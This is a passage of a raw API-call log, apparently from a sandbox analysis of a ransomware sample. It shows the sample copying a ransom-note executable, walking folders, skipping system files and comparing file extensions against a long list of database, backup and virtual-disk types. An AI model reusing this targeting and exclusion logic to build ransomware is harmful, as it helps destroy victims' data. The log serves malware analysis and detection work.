iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0063.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0063.341] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0063.341] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned 70 [0063.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0063.341] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0063.341] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0063.341] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0063.342] GetLastError () returned 0x0 [0063.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0063.342] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0063.342] CloseHandle (hObject=0x12c) returned 1 [0063.342] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0063.342] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.342] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0063.342] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.342] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0063.342] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.342] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a874760, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a874760, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.343] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.343] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0063.343] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.343] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.343] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x64c3520, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x64c3520, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xcdfff30e, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Bears.htm", cAlternateFileName="")) returned 1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="aoldtz.exe") returned 1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2=".") returned 1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="..") returned 1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="windows") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="bootmgr") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="temp") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="pagefile.sys") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="boot") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="ids.txt") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="ntuser.dat") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="perflogs") returned -1 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2="MSBuild") returned -1 [0063.343] lstrlenW (lpString="Bears.htm") returned 9 [0063.343] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\*") returned 72 [0063.343] lstrcpyW (in: lpString1=0x2cce48e, lpString2="Bears.htm" | out: lpString1="Bears.htm") returned="Bears.htm" [0063.343] lstrlenW (lpString="Bears.htm") returned 9 [0063.343] lstrlenW (lpString="Ares865") returned 7 [0063.343] lstrcmpiW (lpString1="ars.htm", lpString2="Ares865") returned 1 [0063.343] lstrlenW (lpString=".dll") returned 4 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2=".dll") returned 1 [0063.343] lstrlenW (lpString=".lnk") returned 4 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2=".lnk") returned 1 [0063.343] lstrlenW (lpString=".ini") returned 4 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2=".ini") returned 1 [0063.343] lstrlenW (lpString=".sys") returned 4 [0063.343] lstrcmpiW (lpString1="Bears.htm", lpString2=".sys") returned 1 [0063.343] lstrlenW (lpString="Bears.htm") returned 9 [0063.343] lstrlenW (lpString="bak") returned 3 [0063.343] lstrcmpiW (lpString1="htm", lpString2="bak") returned 1 [0063.344] lstrlenW (lpString="ba_") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="ba_") returned 1 [0063.344] lstrlenW (lpString="dbb") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="dbb") returned 1 [0063.344] lstrlenW (lpString="vmdk") returned 4 [0063.344] lstrcmpiW (lpString1=".htm", lpString2="vmdk") returned -1 [0063.344] lstrlenW (lpString="rar") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="rar") returned -1 [0063.344] lstrlenW (lpString="zip") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="zip") returned -1 [0063.344] lstrlenW (lpString="tgz") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="tgz") returned -1 [0063.344] lstrlenW (lpString="vbox") returned 4 [0063.344] lstrcmpiW (lpString1=".htm", lpString2="vbox") returned -1 [0063.344] lstrlenW (lpString="vdi") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="vdi") returned -1 [0063.344] lstrlenW (lpString="vhd") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="vhd") returned -1 [0063.344] lstrlenW (lpString="vhdx") returned 4 [0063.344] lstrcmpiW (lpString1=".htm", lpString2="vhdx") returned -1 [0063.344] lstrlenW (lpString="avhd") returned 4 [0063.344] lstrcmpiW (lpString1=".htm", lpString2="avhd") returned -1 [0063.344] lstrlenW (lpString="db") returned 2 [0063.344] lstrcmpiW (lpString1="tm", lpString2="db") returned 1 [0063.344] lstrlenW (lpString="db2") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="db2") returned 1 [0063.344] lstrlenW (lpString="db3") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="db3") returned 1 [0063.344] lstrlenW (lpString="dbf") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="dbf") returned 1 [0063.344] lstrlenW (lpString="mdf") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="mdf") returned -1 [0063.344] lstrlenW (lpString="mdb") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="mdb") returned -1 [0063.344] lstrlenW (lpString="sql") returned 3 [0063.344] lstrcmpiW (lpString1="htm", lpString2="sql") returned -1 [0063.344] lstrlenW (lpString="sqlite") returned 6 [0063.345] lstrcmpiW (lpString1="rs.htm", lpString2="sqlite") returned -1 [0063.345] lstrlenW (lpString="sqlite3") returned 7 [0063.345] lstrcmpiW (lpString1="ars.htm", lpString2="sqlite3") returned -1 [0063.345] lstrlenW (lpString="sqlitedb") returned 8 [0063.345] lstrcmpiW (lpString1="ears.htm", lpString2="sqlitedb") returned -1 [0063.345] lstrlenW (lpString="xml") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="xml") returned -1 [0063.345] lstrlenW (lpString="$er") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="$er") returned 1 [0063.345] lstrlenW (lpString="4dd") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="4dd") returned 1 [0063.345] lstrlenW (lpString="4dl") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="4dl") returned 1 [0063.345] lstrlenW (lpString="^^^") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="^^^") returned 1 [0063.345] lstrlenW (lpString="abs") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="abs") returned 1 [0063.345] lstrlenW (lpString="abx") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="abx") returned 1 [0063.345] lstrlenW (lpString="accdb") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accdb") returned 1 [0063.345] lstrlenW (lpString="accdc") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accdc") returned 1 [0063.345] lstrlenW (lpString="accde") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accde") returned 1 [0063.345] lstrlenW (lpString="accdr") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accdr") returned 1 [0063.345] lstrlenW (lpString="accdt") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accdt") returned 1 [0063.345] lstrlenW (lpString="accdw") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accdw") returned 1 [0063.345] lstrlenW (lpString="accft") returned 5 [0063.345] lstrcmpiW (lpString1="s.htm", lpString2="accft") returned 1 [0063.345] lstrlenW (lpString="adb") returned 3 [0063.345] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.355] lstrlenW (lpString="adb") returned 3 [0063.355] lstrcmpiW (lpString1="htm", lpString2="adb") returned 1 [0063.355] lstrlenW (lpString="ade") returned 3 [0063.355] lstrcmpiW (lpString1="htm", lpString2="ade") returned 1 [0063.355] lstrlenW (lpString="adf") returned 3 [0063.355] lstrcmpiW (lpString1="htm", lpString2="adf") returned 1 [0063.356] lstrlenW (lpString="adn") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="adn") returned 1 [0063.356] lstrlenW (lpString="adp") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="adp") returned 1 [0063.356] lstrlenW (lpString="alf") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="alf") returned 1 [0063.356] lstrlenW (lpString="ask") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="ask") returned 1 [0063.356] lstrlenW (lpString="btr") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="btr") returned 1 [0063.356] lstrlenW (lpString="cat") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="cat") returned 1 [0063.356] lstrlenW (lpString="cdb") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="cdb") returned 1 [0063.356] lstrlenW (lpString="ckp") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="ckp") returned 1 [0063.356] lstrlenW (lpString="cma") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="cma") returned 1 [0063.356] lstrlenW (lpString="cpd") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="cpd") returned 1 [0063.356] lstrlenW (lpString="dacpac") returned 6 [0063.356] lstrcmpiW (lpString1="rs.htm", lpString2="dacpac") returned 1 [0063.356] lstrlenW (lpString="dad") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="dad") returned 1 [0063.356] lstrlenW (lpString="dadiagrams") returned 10 [0063.356] lstrlenW (lpString="daschema") returned 8 [0063.356] lstrcmpiW (lpString1="ears.htm", lpString2="daschema") returned 1 [0063.356] lstrlenW (lpString="db-journal") returned 10 [0063.356] lstrlenW (lpString="db-shm") returned 6 [0063.356] lstrcmpiW (lpString1="rs.htm", lpString2="db-shm") returned 1 [0063.356] lstrlenW (lpString="db-wal") returned 6 [0063.356] lstrcmpiW (lpString1="rs.htm", lpString2="db-wal") returned 1 [0063.356] lstrlenW (lpString="dbc") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="dbc") returned 1 [0063.356] lstrlenW (lpString="dbs") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="dbs") returned 1 [0063.356] lstrlenW (lpString="dbt") returned 3 [0063.356] lstrcmpiW (lpString1="htm", lpString2="dbt") returned 1 [0063.357] lstrlenW (lpString="dbv") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dbv") returned 1 [0063.357] lstrlenW (lpString="dbx") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dbx") returned 1 [0063.357] lstrlenW (lpString="dcb") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dcb") returned 1 [0063.357] lstrlenW (lpString="dct") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dct") returned 1 [0063.357] lstrlenW (lpString="dcx") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dcx") returned 1 [0063.357] lstrlenW (lpString="ddl") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="ddl") returned 1 [0063.357] lstrlenW (lpString="dlis") returned 4 [0063.357] lstrcmpiW (lpString1=".htm", lpString2="dlis") returned -1 [0063.357] lstrlenW (lpString="dp1") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dp1") returned 1 [0063.357] lstrlenW (lpString="dqy") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dqy") returned 1 [0063.357] lstrlenW (lpString="dsk") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dsk") returned 1 [0063.357] lstrlenW (lpString="dsn") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dsn") returned 1 [0063.357] lstrlenW (lpString="dtsx") returned 4 [0063.357] lstrcmpiW (lpString1=".htm", lpString2="dtsx") returned -1 [0063.357] lstrlenW (lpString="dxl") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="dxl") returned 1 [0063.357] lstrlenW (lpString="eco") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="eco") returned 1 [0063.357] lstrlenW (lpString="ecx") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="ecx") returned 1 [0063.357] lstrlenW (lpString="edb") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="edb") returned 1 [0063.357] lstrlenW (lpString="epim") returned 4 [0063.357] lstrcmpiW (lpString1=".htm", lpString2="epim") returned -1 [0063.357] lstrlenW (lpString="fcd") returned 3 [0063.357] lstrcmpiW (lpString1="htm", lpString2="fcd") returned 1 [0063.357] lstrlenW (lpString="fdb") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fdb") returned 1 [0063.358] lstrlenW (lpString="fic") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fic") returned 1 [0063.358] lstrlenW (lpString="flexolibrary") returned 12 [0063.358] lstrlenW (lpString="fm5") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fm5") returned 1 [0063.358] lstrlenW (lpString="fmp") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fmp") returned 1 [0063.358] lstrlenW (lpString="fmp12") returned 5 [0063.358] lstrcmpiW (lpString1="s.htm", lpString2="fmp12") returned 1 [0063.358] lstrlenW (lpString="fmpsl") returned 5 [0063.358] lstrcmpiW (lpString1="s.htm", lpString2="fmpsl") returned 1 [0063.358] lstrlenW (lpString="fol") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fol") returned 1 [0063.358] lstrlenW (lpString="fp3") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fp3") returned 1 [0063.358] lstrlenW (lpString="fp4") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fp4") returned 1 [0063.358] lstrlenW (lpString="fp5") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fp5") returned 1 [0063.358] lstrlenW (lpString="fp7") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fp7") returned 1 [0063.358] lstrlenW (lpString="fpt") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="fpt") returned 1 [0063.358] lstrlenW (lpString="frm") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="frm") returned 1 [0063.358] lstrlenW (lpString="gdb") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.358] lstrlenW (lpString="gdb") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="gdb") returned 1 [0063.358] lstrlenW (lpString="grdb") returned 4 [0063.358] lstrcmpiW (lpString1=".htm", lpString2="grdb") returned -1 [0063.358] lstrlenW (lpString="gwi") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="gwi") returned 1 [0063.358] lstrlenW (lpString="hdb") returned 3 [0063.358] lstrcmpiW (lpString1="htm", lpString2="hdb") returned 1 [0063.358] lstrlenW (lpString="his") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="his") returned 1 [0063.359] lstrlenW (lpString="ib") returned 2 [0063.359] lstrcmpiW (lpString1="tm", lpString2="ib") returned 1 [0063.359] lstrlenW (lpString="idb") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="idb") returned -1 [0063.359] lstrlenW (lpString="ihx") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="ihx") returned -1 [0063.359] lstrlenW (lpString="itdb") returned 4 [0063.359] lstrcmpiW (lpString1=".htm", lpString2="itdb") returned -1 [0063.359] lstrlenW (lpString="itw") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="itw") returned -1 [0063.359] lstrlenW (lpString="jet") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="jet") returned -1 [0063.359] lstrlenW (lpString="jtx") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="jtx") returned -1 [0063.359] lstrlenW (lpString="kdb") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="kdb") returned -1 [0063.359] lstrlenW (lpString="kexi") returned 4 [0063.359] lstrcmpiW (lpString1=".htm", lpString2="kexi") returned -1 [0063.359] lstrlenW (lpString="kexic") returned 5 [0063.359] lstrcmpiW (lpString1="s.htm", lpString2="kexic") returned 1 [0063.359] lstrlenW (lpString="kexis") returned 5 [0063.359] lstrcmpiW (lpString1="s.htm", lpString2="kexis") returned 1 [0063.359] lstrlenW (lpString="lgc") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="lgc") returned -1 [0063.359] lstrlenW (lpString="lwx") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="lwx") returned -1 [0063.359] lstrlenW (lpString="maf") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="maf") returned -1 [0063.359] lstrlenW (lpString="maq") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="maq") returned -1 [0063.359] lstrlenW (lpString="mar") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="mar") returned -1 [0063.359] lstrlenW (lpString="marshal") returned 7 [0063.359] lstrcmpiW (lpString1="ars.htm", lpString2="marshal") returned -1 [0063.359] lstrlenW (lpString="mas") returned 3 [0063.359] lstrcmpiW (lpString1="htm", lpString2="mas") returned -1 [0063.359] lstrlenW (lpString="mav") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mav") returned -1 [0063.360] lstrlenW (lpString="maw") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="maw") returned -1 [0063.360] lstrlenW (lpString="mdbhtml") returned 7 [0063.360] lstrcmpiW (lpString1="ars.htm", lpString2="mdbhtml") returned -1 [0063.360] lstrlenW (lpString="mdn") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mdn") returned -1 [0063.360] lstrlenW (lpString="mdt") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mdt") returned -1 [0063.360] lstrlenW (lpString="mfd") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mfd") returned -1 [0063.360] lstrlenW (lpString="mpd") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mpd") returned -1 [0063.360] lstrlenW (lpString="mrg") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mrg") returned -1 [0063.360] lstrlenW (lpString="mud") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mud") returned -1 [0063.360] lstrlenW (lpString="mwb") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="mwb") returned -1 [0063.360] lstrlenW (lpString="myd") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="myd") returned -1 [0063.360] lstrlenW (lpString="ndf") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="ndf") returned -1 [0063.360] lstrlenW (lpString="nnt") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="nnt") returned -1 [0063.360] lstrlenW (lpString="nrmlib") returned 6 [0063.360] lstrcmpiW (lpString1="rs.htm", lpString2="nrmlib") returned 1 [0063.360] lstrlenW (lpString="ns2") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="ns2") returned -1 [0063.360] lstrlenW (lpString="ns3") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="ns3") returned -1 [0063.360] lstrlenW (lpString="ns4") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="ns4") returned -1 [0063.360] lstrlenW (lpString="nsf") returned 3 [0063.360] lstrcmpiW (lpString1="htm", lpString2="nsf") returned -1 [0063.360] lstrlenW (lpString="nv") returned 2 [0063.360] lstrcmpiW (lpString1="tm", lpString2="nv") returned 1 [0063.361] lstrlenW (lpString="nv2") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="nv2") returned -1 [0063.361] lstrlenW (lpString="nwdb") returned 4 [0063.361] lstrcmpiW (lpString1=".htm", lpString2="nwdb") returned -1 [0063.361] lstrlenW (lpString="nyf") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="nyf") returned -1 [0063.361] lstrlenW (lpString="odb") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.361] lstrlenW (lpString="odb") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="odb") returned -1 [0063.361] lstrlenW (lpString="oqy") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="oqy") returned -1 [0063.361] lstrlenW (lpString="ora") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="ora") returned -1 [0063.361] lstrlenW (lpString="orx") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="orx") returned -1 [0063.361] lstrlenW (lpString="owc") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="owc") returned -1 [0063.361] lstrlenW (lpString="p96") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="p96") returned -1 [0063.361] lstrlenW (lpString="p97") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="p97") returned -1 [0063.361] lstrlenW (lpString="pan") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="pan") returned -1 [0063.361] lstrlenW (lpString="pdb") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="pdb") returned -1 [0063.361] lstrlenW (lpString="pdm") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="pdm") returned -1 [0063.361] lstrlenW (lpString="pnz") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="pnz") returned -1 [0063.361] lstrlenW (lpString="qry") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="qry") returned -1 [0063.361] lstrlenW (lpString="qvd") returned 3 [0063.361] lstrcmpiW (lpString1="htm", lpString2="qvd") returned -1 [0063.361] lstrlenW (lpString="rbf") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="rbf") returned -1 [0063.362] lstrlenW (lpString="rctd") returned 4 [0063.362] lstrcmpiW (lpString1=".htm", lpString2="rctd") returned -1 [0063.362] lstrlenW (lpString="rod") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="rod") returned -1 [0063.362] lstrlenW (lpString="rodx") returned 4 [0063.362] lstrcmpiW (lpString1=".htm", lpString2="rodx") returned -1 [0063.362] lstrlenW (lpString="rpd") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="rpd") returned -1 [0063.362] lstrlenW (lpString="rsd") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="rsd") returned -1 [0063.362] lstrlenW (lpString="sas7bdat") returned 8 [0063.362] lstrcmpiW (lpString1="ears.htm", lpString2="sas7bdat") returned -1 [0063.362] lstrlenW (lpString="sbf") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="sbf") returned -1 [0063.362] lstrlenW (lpString="scx") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="scx") returned -1 [0063.362] lstrlenW (lpString="sdb") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="sdb") returned -1 [0063.362] lstrlenW (lpString="sdc") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="sdc") returned -1 [0063.362] lstrlenW (lpString="sdf") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="sdf") returned -1 [0063.362] lstrlenW (lpString="sis") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="sis") returned -1 [0063.362] lstrlenW (lpString="spq") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="spq") returned -1 [0063.362] lstrlenW (lpString="te") returned 2 [0063.362] lstrcmpiW (lpString1="tm", lpString2="te") returned 1 [0063.362] lstrlenW (lpString="teacher") returned 7 [0063.362] lstrcmpiW (lpString1="ars.htm", lpString2="teacher") returned -1 [0063.362] lstrlenW (lpString="tmd") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="tmd") returned -1 [0063.362] lstrlenW (lpString="tps") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="tps") returned -1 [0063.362] lstrlenW (lpString="trc") returned 3 [0063.362] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.363] lstrlenW (lpString="trc") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="trc") returned -1 [0063.363] lstrlenW (lpString="trm") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="trm") returned -1 [0063.363] lstrlenW (lpString="udb") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="udb") returned -1 [0063.363] lstrlenW (lpString="udl") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="udl") returned -1 [0063.363] lstrlenW (lpString="usr") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="usr") returned -1 [0063.363] lstrlenW (lpString="v12") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="v12") returned -1 [0063.363] lstrlenW (lpString="vis") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="vis") returned -1 [0063.363] lstrlenW (lpString="vpd") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="vpd") returned -1 [0063.363] lstrlenW (lpString="vvv") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="vvv") returned -1 [0063.363] lstrlenW (lpString="wdb") returned 3 [0063.363] lstrcmpiW (lpString1="htm", lpString2="wdb") returned -1 [0063.363] lstrlenW (lpString="wmdb") returned 